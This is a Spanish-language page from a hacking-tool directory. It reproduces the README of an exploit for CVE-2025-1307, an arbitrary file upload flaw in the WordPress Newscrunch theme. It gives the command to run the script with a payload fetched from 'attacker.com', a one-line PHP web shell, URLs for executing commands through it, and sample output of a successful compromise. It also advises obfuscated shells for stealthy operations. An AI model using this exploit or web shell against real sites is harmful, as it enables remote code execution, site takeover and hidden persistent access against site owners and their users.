Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - Autenticado (Suscriptor+) Subida arbitraria de archivos | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-1307
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - Autenticado (Suscriptor+) Subida arbitraria de archivos

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Newscrunch (CVE-2025-1307)

🚨 Resumen

Este exploit se dirige a una vulnerabilidad crítica (CVE-2025-1307) en el tema Newscrunch de WordPress. La falla permite a usuarios autenticados (Suscriptor y superiores) subir archivos arbitrarios debido a la falta de comprobaciones de capacidad en la función newscrunch_install_and_activate_plugin(). Esto puede conducir a Ejecución Remota de Código (RCE), comprometiendo completamente el sitio WordPress afectado.


🔥 Detalles de la Vulnerabilidad

  • CVE ID: CVE-2025-1307
  • Software Afectado: Tema Newscrunch de WordPress (<= 1.8.4.1)
  • Clasificación CWE: CWE-862 - Autorización faltante
  • Puntuación CVSS: 9.8 (Crítico)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Fecha de Publicación: 4 de marzo de 2025

🛑 Severidad e Impacto

  • ✅ Ejecución Remota de Código (RCE)
  • ✅ Compromiso Total del Sistema
  • ✅ Subida de Archivos No Autorizada
  • ✅ Riesgo de Escalada de Privilegios

Explotabilidad: Requiere una cuenta válida de WordPress con privilegios de Suscriptor o superiores.


📜 Características del Script

✅ Explotación automatizada de CVE-2025-1307
✅ Detección automática de la versión vulnerable del tema
✅ Extracción y ejecución automática del payload ZIP
✅ Obtiene dinámicamente el nombre del archivo shell del ZIP
✅ Comprueba automáticamente la disponibilidad del shell después de la explotación
✅ Registro limpio y estructurado para depuración


🚀 Cómo Usar

📌 Requisitos Previos

Asegúrate de tener Python 3.x instalado e instala las dependencias requeridas:

root@kitploit:~
pip install requests urllib3 packaging

🔧 Ejecutando el Exploit

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 Uso

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ Usando el Shell Subido

Una vez que el shell se sube correctamente, permite la ejecución remota de comandos en el sistema objetivo. El archivo del shell debe colocarse dentro de un archivo ZIP y se extraerá automáticamente durante la explotación.

🔹 Creando el Payload ZIP

Asegúrate de que tu shell PHP (shell.php) esté dentro de un archivo ZIP. Luego, sube el archivo ZIP usando el exploit.

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 Ejecutando Comandos

Puedes ejecutar comandos del sistema a través del navegador añadiendo el parámetro cmd a la URL del shell:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ Asegurando el Shell

  • Dado que es un web shell simple, carece de autenticación y debe usarse con precaución.
  • Si se detecta, los administradores pueden eliminarlo fácilmente.
  • Considera usar código PHP ofuscado o shells protegidos con contraseña para operaciones sigilosas.

🔹 Salida Esperada

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ Aviso Legal

Esta herramienta es solo para fines educativos y de investigación en seguridad. La explotación no autorizada de vulnerabilidades es ilegal y está penada por la ley. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Úsala de forma responsable.

Por: Nxploit | Khaled Alenazi

Descargar herramienta